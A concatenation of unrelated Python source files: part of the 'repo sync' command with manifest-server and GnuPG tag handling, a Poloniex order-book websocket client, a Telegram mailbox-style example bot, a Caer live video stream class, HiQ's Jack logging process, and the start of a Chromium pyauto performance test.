remote = RemoteSpec('origin'),
gitdir = gitdir,
objdir = gitdir,
worktree = os.path.join(self.manifest.topdir, path),
relpath = path,
revisionExpr = 'HEAD',
revisionId = None,
groups = None)
if project.IsDirty() and opt.force_remove_dirty:
print('WARNING: Removing dirty project "%s": uncommitted changes '
'erased' % project.relpath, file=sys.stderr)
self._DeleteProject(project.worktree)
elif project.IsDirty():
print('error: Cannot remove project "%s": uncommitted changes '
'are present' % project.relpath, file=sys.stderr)
print(' commit changes, then run sync again',
file=sys.stderr)
return -1
elif self._DeleteProject(project.worktree):
return -1
new_project_paths.sort()
fd = open(file_path, 'w')
try:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
finally:
fd.close()
return 0
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) / 3)
if opt.network_only and opt.detach_head:
print('error: cannot combine -n and -d', file=sys.stderr)
sys.exit(1)
if opt.network_only and opt.local_only:
print('error: cannot combine -n and -l', file=sys.stderr)
sys.exit(1)
if opt.manifest_name and opt.smart_sync:
print('error: cannot combine -m and -s', file=sys.stderr)
sys.exit(1)
if opt.manifest_name and opt.smart_tag:
print('error: cannot combine -m and -t', file=sys.stderr)
sys.exit(1)
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
print('error: -u and -p may only be combined with -s or -t',
file=sys.stderr)
sys.exit(1)
if None in [opt.manifest_server_username, opt.manifest_server_password]:
print('error: both -u and -p must be given', file=sys.stderr)
sys.exit(1)
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
smart_sync_manifest_name = "smart_sync_override.xml"
smart_sync_manifest_path = os.path.join(
self.manifest.manifestProject.worktree, smart_sync_manifest_name)
if opt.smart_sync or opt.smart_tag:
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if not '@' in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
# .netrc file does not exist or could not be opened
pass
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
auth = info.authenticators(parse_result.hostname)
if auth:
username, _account, password = auth
else:
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
transport = PersistentTransport(manifest_server)
if manifest_server.startswith('persistent-'):
manifest_server = manifest_server[len('persistent-'):]
try:
server = xmlrpc.client.Server(manifest_server, transport=transport)
if opt.smart_sync:
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
env = os.environ.copy()
if 'SYNC_TARGET' in env:
target = env['SYNC_TARGET']
[success, manifest_str] = server.GetApprovedManifest(branch, target)
elif 'TARGET_PRODUCT' in env and 'TARGET_BUILD_VARIANT' in env:
target = '%s-%s' % (env['TARGET_PRODUCT'],
env['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = smart_sync_manifest_name
try:
f = open(smart_sync_manifest_path, 'w')
try:
f.write(manifest_str)
finally:
f.close()
except IOError as e:
print('error: cannot write manifest to %s:\n%s'
% (smart_sync_manifest_path, e),
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
else: # Not smart sync or smart tag mode
if os.path.isfile(smart_sync_manifest_path):
try:
platform_utils.remove(smart_sync_manifest_path)
except OSError as e:
print('error: failed to remove existing smart sync override manifest: %s' %
e, file=sys.stderr)
rp = self.manifest.repoProject
rp.PreSync()
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.local_only:
start = time.time()
success = mp.Sync_NetworkHalf(quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
no_tags=opt.no_tags,
optimized_fetch=opt.optimized_fetch,
submodules=self.manifest.HasSubmodules)
finish = time.time()
self.event_log.AddSync(mp, event_log.TASK_SYNC_NETWORK,
start, finish, success)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
start = time.time()
mp.Sync_LocalHalf(syncbuf, submodules=self.manifest.HasSubmodules)
clean = syncbuf.Finish()
self.event_log.AddSync(mp, event_log.TASK_SYNC_LOCAL,
start, time.time(), clean)
if not clean:
sys.exit(1)
self._ReloadManifest(manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
if self.gitc_manifest:
gitc_manifest_projects = self.GetProjects(args,
missing_ok=True)
gitc_projects = []
opened_projects = []
for project in gitc_manifest_projects:
if project.relpath in self.gitc_manifest.paths and \
self.gitc_manifest.paths[project.relpath].old_revision:
opened_projects.append(project.relpath)
else:
gitc_projects.append(project.relpath)
if not args:
gitc_projects = None
if gitc_projects != [] and not opt.local_only:
print('Updating GITC client: %s' % self.gitc_manifest.gitc_client_name)
manifest = GitcManifest(self.repodir, self.gitc_manifest.gitc_client_name)
if manifest_name:
manifest.Override(manifest_name)
else:
manifest.Override(self.manifest.manifestFile)
gitc_utils.generate_gitc_manifest(self.gitc_manifest,
manifest,
gitc_projects)
print('GITC client successfully synced.')
# The opened projects need to be synced as normal, therefore we
# generate a new args list to represent the opened projects.
# TODO: make this more reliable -- if there's a project name/path overlap,
# this may choose the wrong project.
args = [os.path.relpath(self.manifest.paths[path].worktree, os.getcwd())
for path in opened_projects]
if not args:
return
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
to_fetch.append(rp)
to_fetch.extend(all_projects)
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt)
_PostRepoFetch(rp, opt.no_repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
# Stop us from non-stopped fetching actually-missing repos: If set of
# missing repos has not been changed from last fetch, we break.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt))
if self.manifest.IsMirror or self.manifest.IsArchive:
# bail out now, we have no working tree
return
if self.UpdateProjectList(opt):
sys.exit(1)
syncbuf = SyncBuffer(mp.config,
detach_head = opt.detach_head)
pm = Progress('Syncing work tree', len(all_projects))
for project in all_projects:
pm.update()
if project.worktree:
start = time.time()
project.Sync_LocalHalf(syncbuf, force_sync=opt.force_sync)
self.event_log.AddSync(project, event_log.TASK_SYNC_LOCAL,
start, time.time(), syncbuf.Recently())
pm.end()
print(file=sys.stderr)
if not syncbuf.Finish():
sys.exit(1)
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = Wrapper()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects:
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, no_repo_verify=False, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if no_repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
print('warning: GnuPG was not available during last "repo init"\n'
'warning: Cannot automatically authenticate repo."""',
file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir.encode()
env['GNUPGHOME'] = gpg_dir.encode()
cmd = [GIT, 'tag', '-v', cur]
proc = subprocess.Popen(cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
env = env)
out = proc.stdout.read()
proc.stdout.close()
err = proc.stderr.read()
proc.stderr.close()
if proc.wait() != 0:
print(file=sys.stderr)
print(out, file=sys.stderr)
print(err, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repo_fetchtimes.json')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
a = self._ALPHA
self._times[name] = (a*t) + ((1-a) * old)
def _Load(self):
if self._times is None:
try:
f = open(self._path)
try:
self._times = json.load(f)
finally:
f.close()
except (IOError, ValueError):
try:
platform_utils.remove(self._path)
except OSError:
pass
self._times = {}
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
f = open(self._path, 'w')
try:
json.dump(self._times, f, indent=2)
finally:
f.close()
except (IOError, TypeError):
try:
platform_utils.remove(self._path)
except OSError:
pass
# This is a replacement for xmlrpc.client.Transport using urllib2
# and supporting persistent-http[s]. It cannot change hosts from
# request to request like the normal transport, the real url
# is passed during initialization.
class PersistentTransport(xmlrpc.client.Transport):
def __init__(self, orig_host):
self.orig_host = orig_host
def request(self, host, handler, request_body, verbose=False):
with GetUrlCookieFile(self.orig_host, not verbose) as (cookiefile, proxy):
# Python doesn't understand cookies with the #HttpOnly_ prefix
# Since we're only using them for HTTP, copy the file temporarily,
# stripping those prefixes away.
if cookiefile:
tmpcookiefile = tempfile.NamedTemporaryFile()
tmpcookiefile.write("# HTTP Cookie File")
try:
with open(cookiefile) as f:
for line in f:
if line.startswith("#HttpOnly_"):
line = line[len("#HttpOnly_"):]
tmpcookiefile.write(line)
tmpcookiefile.flush()
cookiejar = cookielib.MozillaCookieJar(tmpcookiefile.name)
try:
cookiejar.load()
except cookielib.LoadError:
cookiejar = cookielib.CookieJar()
finally:
tmpcookiefile.close()
else:
cookiejar = cookielib.CookieJar()
proxyhandler = urllib.request.ProxyHandler
if proxy:
proxyhandler = urllib.request.ProxyHandler({
"http": proxy,
"https": proxy })
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(cookiejar),
proxyhandler)
url = urllib.parse.urljoin(self.orig_host, handler)
parse_results = urllib.parse.urlparse(url)
scheme = parse_results.scheme
if scheme == 'persistent-http':
scheme = 'http'
if scheme == 'persistent-https':
# If we're proxying through persistent-https, use http. The
# proxy itself will do the https.
if proxy:
scheme = 'http'
else:
scheme = 'https'
# Parse out any authentication information using the base class
host, extra_headers, _ = self.get_host_info(parse_results.netloc)
url = urllib.parse.urlunparse((
scheme,
host,
parse_results.path,
parse_results.params,
parse_results.query,
parse_results.fragment))
request = urllib.request.Request(url, request_body)
if extra_headers is not None:
for (name, header) in extra_headers:
request.add_header(name, header)
request.add_header('Content-Type', 'text/xml')
try:
response = opener.open(request)
except urllib.error.HTTPError as e:
if e.code == 501:
# We may have been redirected through a login process
# but our POST turned into a GET. Retry.
response = opener.open(request)
else:
raise
p, u = xmlrpc.client.getparser()
while 1:
data = response.read(1024)
if not data:
break
p.feed(data)
p.close()
return u.close()
def close(self):
pass
|
poloniex.py
|
from autobahn.asyncio.wamp import ApplicationSession
from autobahn.asyncio.wamp import ApplicationRunner
from asyncio import coroutine
from time import sleep
import threading
def start_poloniex_runner(delegate):
runner = ApplicationRunner("wss://api.poloniex.com:443", "realm1", extra={'poloniex': delegate})
runner.run(PoloniexComponent)
class Poloniex:
def __init__(self):
self.bids = []
self.asks = []
def start(self):
thr = threading.Thread(target=start_poloniex_runner, args=(self,), kwargs={})
thr.start()
# _thread.start_new_thread(self.runner.run, (PoloniexComponent,))
# self.runner.run(PoloniexComponent)
def onTicker(self, currencyPair, last, lowestAsk, highestBid, percentChange, baseVolume, quoteVolume, isFrozen, high, low):
# print(currencyPair, last)
pass
def onMarketUpdate(self, *args, seq=0):
for update in args:
update_type = update['type']
if update_type == 'orderBookModify':
self.onOrderbookUpdate(update['data'], seq)
elif update_type == 'orderBookRemove':
self.onOrderbookRemove(update['data'], seq)
elif update_type == 'newTrade':
self.onTrade(update['data'], seq)
def onOrderbookUpdate(self, data, time):
if data['type'] == 'bid':
self.updateBid(float(data['rate']), float(data['amount']), int(time))
elif data['type'] == 'ask':
self.updateAsk(float(data['rate']), float(data['amount']), int(time))
def onOrderbookRemove(self, data, time):
if data['type'] == 'bid':
self.updateBid(float(data['rate']), 0, int(time))
elif data['type'] == 'ask':
self.updateAsk(float(data['rate']), 0, int(time))
def onTrade(self, data, time):
# print('TRADE', data)
pass
def updateBid(self, price, amount, time):
index = 0
while index < len(self.bids):
if price > self.bids[index].price:
break
index += 1
if index < len(self.bids):
if amount > 0:
if price == self.bids[index].price:
if time > self.bids[index].time:
self.bids[index].amount = amount
self.bids[index].time = time
else:
self.bids.insert(index, Order(price, amount, time))
else:
if price == self.bids[index].price:
self.bids.pop(index)
else:
self.bids.append(Order(price, amount, time))
print('BIDS: ' + str(self.bids))
def updateAsk(self, price, amount, time):
index = 0
while index < len(self.asks):
if price < self.asks[index].price:
break
index += 1
if index < len(self.asks):
if amount > 0:
if price == self.asks[index].price:
if time > self.asks[index].time:
self.asks[index].amount = amount
self.asks[index].time = time
else:
self.asks.insert(index, Order(price, amount, time))
else:
if price == self.asks[index].price:
self.asks.pop(index)
else:
self.asks.append(Order(price, amount, time))
print('ASKS: ' + str(self.asks))
class Order:
def __init__(self, price, amount, time):
self.price = price
self.amount = amount
self.time = time
def __repr__(self):
# return '<' + str(self.price) + ', ' + str(self.amount) + '>'
return '<' + str(self.price) + '>'
class PoloniexComponent(ApplicationSession):
def onConnect(self):
self.poloniex = self.config.extra['poloniex']
self.join(self.config.realm)
@coroutine
def onJoin(self, details):
try:
yield from self.subscribe(self.poloniex.onTicker, 'ticker')
yield from self.subscribe(self.poloniex.onMarketUpdate, 'BTC_XMR')
except Exception as e:
print("Could not subscribe to topic:", e)
def main():
polo = Poloniex()
polo.start()
while True:
print('lol')
sleep(1)
if __name__ == "__main__":
main()
|
chatbox_nodb.py
|
import sys
import time
import amanobot
from amanobot.loop import MessageLoop
from amanobot.delegate import (
per_chat_id_in, per_application, call, create_open, pave_event_space)
"""
$ python3 chatbox_nodb.py <token> <owner_id>
Chatbox - a mailbox for chats
1. People send messages to your bot.
2. Your bot remembers the messages.
3. You read the messages later.
It accepts the following commands from you, the owner, only:
- `/unread` - tells you who has sent you messages and how many
- `/next` - read next sender's messages
This example can be a starting point for **customer support** type of bots.
For example, customers send questions to a bot account; staff answers questions
behind the scene, makes it look like the bot is answering questions.
It further illustrates the use of `DelegateBot` and `ChatHandler`, and how to
spawn delegates differently according to the role of users.
This example only handles text messages and stores messages in memory.
If the bot is killed, all messages are lost. It is an *example* after all.
"""
# Simulate a database to store unread messages
class UnreadStore():
def __init__(self):
self._db = {}
def put(self, msg):
chat_id = msg['chat']['id']
if chat_id not in self._db:
self._db[chat_id] = []
self._db[chat_id].append(msg)
# Pull all unread messages of a `chat_id`
def pull(self, chat_id):
messages = self._db[chat_id]
del self._db[chat_id]
# sort by date
messages.sort(key=lambda m: m['date'])
return messages
# Tells how many unread messages per chat_id
def unread_per_chat(self):
return [(k,len(v)) for k,v in self._db.items()]
# Accept commands from owner. Give him unread messages.
class OwnerHandler(amanobot.helper.ChatHandler):
def __init__(self, seed_tuple, store, **kwargs):
super(OwnerHandler, self).__init__(seed_tuple, **kwargs)
self._store = store
def _read_messages(self, messages):
for msg in messages:
# assume all messages are text
self.sender.sendMessage(msg['text'])
def on_chat_message(self, msg):
content_type, chat_type, chat_id = amanobot.glance(msg)
if content_type != 'text':
self.sender.sendMessage("I don't understand")
return
command = msg['text'].strip().lower()
# Tells who has sent you how many messages
if command == '/unread':
results = self._store.unread_per_chat()
lines = []
for r in results:
n = 'ID: %d\n%d unread' % r
lines.append(n)
if not len(lines):
self.sender.sendMessage('No unread messages')
else:
self.sender.sendMessage('\n'.join(lines))
# read next sender's messages
elif command == '/next':
results = self._store.unread_per_chat()
if not len(results):
self.sender.sendMessage('No unread messages')
return
chat_id = results[0][0]
unread_messages = self._store.pull(chat_id)
self.sender.sendMessage('From ID: %d' % chat_id)
self._read_messages(unread_messages)
else:
self.sender.sendMessage("I don't understand")
class MessageSaver(amanobot.helper.Monitor):
def __init__(self, seed_tuple, store, exclude):
# The `capture` criteria means to capture all messages.
super(MessageSaver, self).__init__(seed_tuple, capture=[[lambda msg: not amanobot.is_event(msg)]])
self._store = store
self._exclude = exclude
# Store every message, except those whose sender is in the exclude list, or non-text messages.
def on_chat_message(self, msg):
content_type, chat_type, chat_id = amanobot.glance(msg)
if chat_id in self._exclude:
print('Chat id %d is excluded.' % chat_id)
return
if content_type != 'text':
print('Content type %s is ignored.' % content_type)
return
print('Storing message: %s' % msg)
self._store.put(msg)
import threading
class CustomThread(threading.Thread):
def start(self):
print('CustomThread starting ...')
super(CustomThread, self).start()
# Note how this function wraps around the `call()` function below to implement
# a custom thread for delegation.
def custom_thread(func):
def f(seed_tuple):
target = func(seed_tuple)
if type(target) is tuple:
run, args, kwargs = target
t = CustomThread(target=run, args=args, kwargs=kwargs)
else:
t = CustomThread(target=target)
return t
return f
class ChatBox(amanobot.DelegatorBot):
def __init__(self, token, owner_id):
self._owner_id = owner_id
self._seen = set()
self._store = UnreadStore()
super(ChatBox, self).__init__(token, [
# Here is a delegate to specially handle owner commands.
pave_event_space()(
per_chat_id_in([owner_id]), create_open, OwnerHandler, self._store, timeout=20),
# Only one MessageSaver is ever spawned for entire application.
(per_application(), create_open(MessageSaver, self._store, exclude=[owner_id])),
# For senders never seen before, send him a welcome message.
(self._is_newcomer, custom_thread(call(self._send_welcome))),
])
# seed-calculating function: use returned value to indicate whether to spawn a delegate
def _is_newcomer(self, msg):
if amanobot.is_event(msg):
return None
chat_id = msg['chat']['id']
if chat_id == self._owner_id: # Sender is owner
return None # No delegate spawned
if chat_id in self._seen: # Sender has been seen before
return None # No delegate spawned
self._seen.add(chat_id)
return [] # non-hashable ==> delegates are independent, no seed association is made.
def _send_welcome(self, seed_tuple):
chat_id = seed_tuple[1]['chat']['id']
print('Sending welcome ...')
self.sendMessage(chat_id, 'Hello!')
TOKEN = sys.argv[1]
OWNER_ID = int(sys.argv[2])
bot = ChatBox(TOKEN, OWNER_ID)
MessageLoop(bot).run_as_thread()
print('Listening ...')
while 1:
time.sleep(10)
|
livestream.py
|
# _____ ______ _____
# / ____/ /\ | ____ | __ \
# | | / \ | |__ | |__) | Caer - Modern Computer Vision
# | | / /\ \ | __| | _ / Languages: Python, C, C++
# | |___ / ____ \ | |____ | | \ \ http://github.com/jasmcaus/caer
# \_____\/_/ \_ \______ |_| \_\
# Licensed under the MIT License <http://opensource.org/licenses/MIT>
# SPDX-License-Identifier: MIT
# Copyright (c) 2020-21 The Caer Authors <http://github.com/jasmcaus>
#pylint:disable=no-member,pointless-string-statement
from threading import Thread
import math
import cv2 as cv
from .constants import FPS
__all__ = [
'LiveStream'
]
"""
Python threading has a specific meaning for daemon. A daemon thread will shut down immediately when the program exits. One way to think about these definitions is to consider the daemon thread a thread that runs in the background without worrying about shutting it down.
If a program is running Threads that are not daemons, then the program will wait for those threads to complete before it terminates. Threads that are daemons, however, are just killed wherever they are when the program is exiting.
"""
# This class can only handle live video streams. When applied on pre-existing videos, there appears to # be an issue with Threading. As a result, the video plays through with a high (almost x4) speed
# This issue has been marked and will be fixed in a future update.
class LiveStream:
r"""
This is an auxiliary class that enables Live Video Streaming for caer with minimalistic latency, and at the expense
of little to no additional computational requirements.
The basic idea behind it is to tracks and save the salient feature array for the given number of frames and then uses these anchor point to cancel out all perturbations relative to it for the incoming frames in the queue. This class relies heavily on **Threaded Queue mode** for error-free & ultra-fast frame handling.
Args:
source (int): Source path for the video. If ``source=0``, the default camera device is used. For
multiple external camera devices, use incremented values. For eg: ``source=1`` represents the second camera device on your system.
"""
def __init__(self, source=0):
r"""
Source must either be an integer (0, 1, 2 etc) or a path to a video file
"""
if isinstance(source, str):
raise ValueError('Expected an integer. Got a filepath. LiveVideoStream is for live streams only')
# Initializing the video stream
self.stream = cv.VideoCapture(source)
print('Live yes')
self.ret, self.frame = self.stream.read()
print('Live not')
self.width = int(self.stream.get(cv.CAP_PROP_FRAME_WIDTH))
self.height = int(self.stream.get(cv.CAP_PROP_FRAME_HEIGHT))
self.res = (self.width, self.height)
self.fps = math.ceil(self.stream.get(FPS))
# Initializing the thread name
self.thread_name = 'DefaultVideoStream'
# Boolean to check whether stream should be killed
self.kill_stream = False
def begin_stream(self):
# Starting the thread to read frames from the video stream
thread = Thread(target=self.update, name=self.thread_name, args=())
thread.daemon = True
thread.start()
return self
def read(self):
return self.frame
def update(self):
while not self.kill_stream:
self.ret, self.frame = self.stream.read()
def release(self):
# Stops the stream
# Releases video pointer
self.kill_stream = True
# Counting frames not applicable for live video
# # Gets frame count
# def count_frames(self):
# if not self.kill_stream:
# if get_opencv_version() == '2':
# return int(self.stream.get(FRAME_COUNT_DEPR))
# else:
# return int(self.stream.get(FRAME_COUNT))
# Gets FPS count
def get_fps(self):
if not self.kill_stream:
return self.fps
# if get_opencv_version() == '2':
# return math.ceil(self.stream.get(FPS_DEPR))
# else:
# return math.ceil(self.stream.get(FPS))
# Get frame dimensions
def get_res(self):
return self.res
|
jack.py
|
# HiQ version 1.0.
#
# Copyright (c) 2022, Oracle and/or its affiliates.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/
#
import os
from multiprocessing import Process, Queue, Lock
import itree
from hiq.tree import Tree
from hiq.utils import _check_overhead, get_env_bool, ensure_folder, get_home
import time
def log_jack_rotated(
log_file=f"{get_home()}/.hiq/log_jack.log",
max_bytes=500 * 1024 * 1024,
backup_count=20,
):
if get_env_bool("NO_JACK_LOG"):
return None
import logging
from logging.handlers import RotatingFileHandler
ensure_folder(log_file)
my_handler = RotatingFileHandler(
log_file,
mode="a",
maxBytes=max_bytes,
backupCount=backup_count,
encoding=None,
delay=0,
)
my_handler.setLevel(logging.INFO)
app_log = logging.getLogger("root")
app_log.setLevel(logging.INFO)
app_log.addHandler(my_handler)
return app_log
def get_kafka():
if get_env_bool("HIQ_OCI_STREAMING"):
from hiq.vendor_oci_streaming import OciStreamingClient
return OciStreamingClient()
return None
class Jack(object):
"""Jack is a lumberjack to send trees to remote HiQ server in his own process space
Jack is disabled by default. To enable it, set env variable JACK=1:
export JACK=1
"""
@staticmethod
def consumer_func(queue, lock):
if os.cpu_count() >= 2:
affinity_list = list(os.sched_getaffinity(0))
os.sched_setaffinity(0, set(affinity_list[len(affinity_list) // 2 :]))
pid = os.getpid()
logger = log_jack_rotated()
kafka_client = get_kafka()
with lock:
print("🅹 🅰 🅒 Ⓚ {} is started".format(pid))
while True:
try:
data = queue.get()
for key, value in data.items():
"""
tree = Tree(value)
itree._itree.consolidate(tree.root)
# tree.show()
data = tree.repr()
"""
if logger:
logger.info(key + "," + value)
if kafka_client:
kafka_client.produce_messages(key, value)
# with lock:
# print(k, t)
# print("🅹 {} got {} {}".format(pid, key, data))
except Exception as e:
time.sleep(0.1)
print(e)
def __init__(sf, *args, **kwargs):
sf.invite_jack = get_env_bool("JACK")
if not sf.invite_jack:
sf.queue_jack = sf.consumer = None
return
sf.queue_jack = Queue()
sf.lock = Lock()
sf.consumer = Process(target=Jack.consumer_func, args=(sf.queue_jack, sf.lock))
# This is critical! The consumer function has an infinite loop
# Which means it will never exit unless we set daemon to true
sf.consumer.daemon = True
sf.consumer.start()
def __del__(sf):
if sf.consumer:
sf.consumer.join()
@_check_overhead
def send_trees_to_jack(sf, d: dict, debug=False):
if not sf.queue_jack:
if debug:
print("Jack is working")
return
data = {}
for k, val in d.items():
data[k] = val.repr()
sf.queue_jack.put_nowait(data)
|
perf.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Basic pyauto performance tests.
For tests that need to be run for multiple iterations (e.g., so that average
and standard deviation values can be reported), the default number of iterations
run for each of these tests is specified by |_DEFAULT_NUM_ITERATIONS|.
That value can optionally be tweaked by setting an environment variable
'NUM_ITERATIONS' to a positive integer, representing the number of iterations
to run. An additional, initial iteration will also be run to "warm up" the
environment, and the result from that initial iteration will be ignored.
Some tests rely on repeatedly appending tabs to Chrome. Occasionally, these
automation calls time out, thereby affecting the timing measurements (see issue
crosbug.com/20503). To work around this, the tests discard timing measurements
that involve automation timeouts. The value |_DEFAULT_MAX_TIMEOUT_COUNT|
specifies the threshold number of timeouts that can be tolerated before the test
fails. To tweak this value, set environment variable 'MAX_TIMEOUT_COUNT' to the
desired threshold value.
"""
import BaseHTTPServer
import commands
import errno
import itertools
import logging
import math
import os
import posixpath
import re
import SimpleHTTPServer
import SocketServer
import signal
import subprocess
import sys
import tempfile
import threading
import time
import timeit
import urllib
import urllib2
import urlparse
import pyauto_functional # Must be imported before pyauto.
import pyauto
import simplejson # Must be imported after pyauto; located in third_party.
from netflix import NetflixTestHelper
import pyauto_utils
import test_utils
from youtube import YoutubeTestHelper
_CHROME_BASE_DIR = os.path.abspath(os.path.join(
os.path.dirname(__file__), os.pardir, os.pardir, os.pardir, os.pardir))
def FormatChromePath(posix_path, **kwargs):
"""Convert a path relative to the Chromium root into an OS-specific path.
Args:
posix_path: a path string that may be a format().
Example: 'src/third_party/{module_name}/__init__.py'
kwargs: args for the format replacement.
Example: {'module_name': 'pylib'}
Returns:
an absolute path in the current Chromium tree with formatting applied.
"""
formated_path = posix_path.format(**kwargs)
path_parts = formated_path.split('/')
return os.path.join(_CHROME_BASE_DIR, *path_parts)
def StandardDeviation(values):
"""Returns the standard deviation of |values|."""
avg = Mean(values)
if len(values) < 2 or not avg:
return 0.0
temp_vals = [math.pow(x - avg, 2) for x in values]
return math.sqrt(sum(temp_vals) / (len(temp_vals) - 1))
def Mean(values):
"""Returns the arithmetic mean of |values|."""
if not values or None in values:
return None
return sum(values) / float(len(values))
def GeometricMean(values):
"""Returns the geometric mean of |values|."""
if not values or None in values or [x for x in values if x < 0.0]:
return None
if 0.0 in values:
return 0.0
return math.exp(Mean([math.log(x) for x in values]))
class BasePerfTest(pyauto.PyUITest):
"""Base class for performance tests."""
_DEFAULT_NUM_ITERATIONS = 10 # Keep synced with desktopui_PyAutoPerfTests.py.
_DEFAULT_MAX_TIMEOUT_COUNT = 10
_PERF_OUTPUT_MARKER_PRE = '_PERF_PRE_'
_PERF_OUTPUT_MARKER_POST = '_PERF_POST_'
def setUp(self):
"""Performs necessary setup work before running each test."""
self._num_iterations = self._DEFAULT_NUM_ITERATIONS
if 'NUM_ITERATIONS' in os.environ:
self._num_iterations = int(os.environ['NUM_ITERATIONS'])
self._max_timeout_count = self._DEFAULT_MAX_TIMEOUT_COUNT
if 'MAX_TIMEOUT_COUNT' in os.environ:
self._max_timeout_count = int(os.environ['MAX_TIMEOUT_COUNT'])
self._timeout_count = 0
# For users who want to see local perf graphs for Chrome when running the
# tests on their own machines.
self._local_perf_dir = None
if 'LOCAL_PERF_DIR' in os.environ:
self._local_perf_dir = os.environ['LOCAL_PERF_DIR']
if not os.path.exists(self._local_perf_dir):
self.fail('LOCAL_PERF_DIR environment variable specified as %s, '
'but this directory does not exist.' % self._local_perf_dir)
# When outputting perf graph information on-the-fly for Chrome, this
# variable lets us know whether a perf measurement is for a new test
# execution, or the current test execution.
self._seen_graph_lines = {}
pyauto.PyUITest.setUp(self)
# Flush all buffers to disk and wait until system calms down. Must be done
# *after* calling pyauto.PyUITest.setUp, since that is where Chrome is
# killed and re-initialized for a new test.
# TODO(dennisjeffrey): Implement wait for idle CPU on Windows/Mac.
if self.IsLinux(): # IsLinux() also implies IsChromeOS().
os.system('sync')
self._WaitForIdleCPU(60.0, 0.05)
def _IsPIDRunning(self, pid):
